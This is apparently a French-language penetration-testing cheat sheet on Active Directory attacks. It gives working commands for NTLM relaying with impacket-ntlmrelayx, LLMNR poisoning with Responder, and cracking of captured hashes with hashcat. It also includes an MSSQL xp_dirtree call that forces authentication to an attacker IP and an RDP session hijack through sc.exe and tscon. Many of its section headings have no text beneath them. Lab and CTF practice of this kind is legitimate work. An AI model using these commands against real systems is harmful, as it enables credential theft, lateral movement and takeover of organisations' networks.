Exploitation

NTLMReplay

cat /etc/responder/Responder.conf | grep 'SMB ='
# SMB = off

impacket-ntlmrelayx --no-http-server -smb2support -t <machine_ip> -c >CMD>
impacket-ntlmrelayx --no-http-server -smb2support -t <machine_ip>

Vole NTLM

sudo responder -I tun0
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

mssql> EXEC master..xp_dirtree '\\10.10.15.193\share\'

Détournement de session

# Disposer droit système
C:\> query user
C:\> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
C:\> net start sessionhijack

Pass-The-Hash

LLMNR/NBT-NS Poisoning

GPOAbuse

Enumération

Kerberoasting

Linux

Si problème horloge :

Windows

ACL

DCSync

Linux

Windows

WriteOwner

Linux

GenericWrite

Linux

GenericAll

Linux

ReadLAPSPassword

Linux

Windows

https://github.com/ztrhgf/LAPS/tree/master/AdmPwd.PS

ForceChangePassword

Certificat Authority

Mis à jour